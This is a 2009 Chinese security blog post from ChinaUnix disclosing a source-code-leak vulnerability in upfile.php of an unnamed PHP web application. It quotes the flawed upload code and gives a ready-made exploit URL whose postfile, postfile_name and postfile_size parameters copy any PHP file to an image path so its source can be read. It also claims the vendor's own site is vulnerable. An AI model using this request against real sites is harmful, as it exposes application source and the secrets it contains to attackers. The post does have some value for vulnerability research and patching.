Chinaunix首页 | 论坛 | 博客
  • 博客访问: 2284084
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-01-16 22:43:56

漏洞发现者:xhming

                        漏洞文件是根目录的upfile.php这次不是上传漏洞,而是泄露源代码!!

if($postfile){

               if( !ereg("^[0-9a-z_/]+$",$dir)||ereg("^/",$dir) ){
                $dir="other";
        }
        $array[name]=is_array($postfile)?$_FILES[postfile][name]:$postfile_name;
        $array[path]=$webdb[updir]."/".$dir;
        $array[size]=is_array($postfile)?$_FILES[postfile][size]:$postfile_size;

        $array[updateTable]=1;

$filename=upfile(is_array($postfile)?$_FILES[postfile][tmp_name]:$postfile,$array);

         看到没有只要$postfile存在,并且不为数组我们就可以为$postfile,$postfile_name,$postfile_size付值

本地直接构造提交页面提交地址为http://www.xxx.com/upfile.php?postfile=biz/product.php&postfile_name=shop/images/default/logo.gif&postfile_size=333 //$postfile可以为任意php文件,提交成功有地址返回!,经测试官方也有此漏洞!

阅读(944) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~